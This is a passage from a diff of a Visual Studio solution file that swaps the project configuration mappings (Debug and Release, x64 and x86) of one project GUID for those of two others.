{C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.ActiveCfg = Debug|Win32 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.Build.0 = Debug|Win32 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.ActiveCfg = Release|x64 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.Build.0 = Release|x64 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.ActiveCfg = Release|Win32 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.Build.0 = Release|Win32 + {81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x64.ActiveCfg = Debug|x64 + {81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x64.Build.0 = Debug|x64 + {81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x86.ActiveCfg = Debug|Win32 + {81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x86.Build.0 = Debug|Win32 + {81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x64.ActiveCfg = Release|x64 + {81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x64.Build.0 = Release|x64 + {81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x86.ActiveCfg = Release|Win32 + {81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x86.Build.0 = Release|Win32 + {0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x64.ActiveCfg = Debug|x64 + {0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x64.Build.0 = Debug|x64 + {0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x86.ActiveCfg = Debug|Win32 + {0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x86.Build.0 = Debug|Win32 + {0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x64.ActiveCfg = Release|x64 + {0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x64.Build.0 = Release|x64 + {0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x86.ActiveCfg = Release|Win32 + {0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE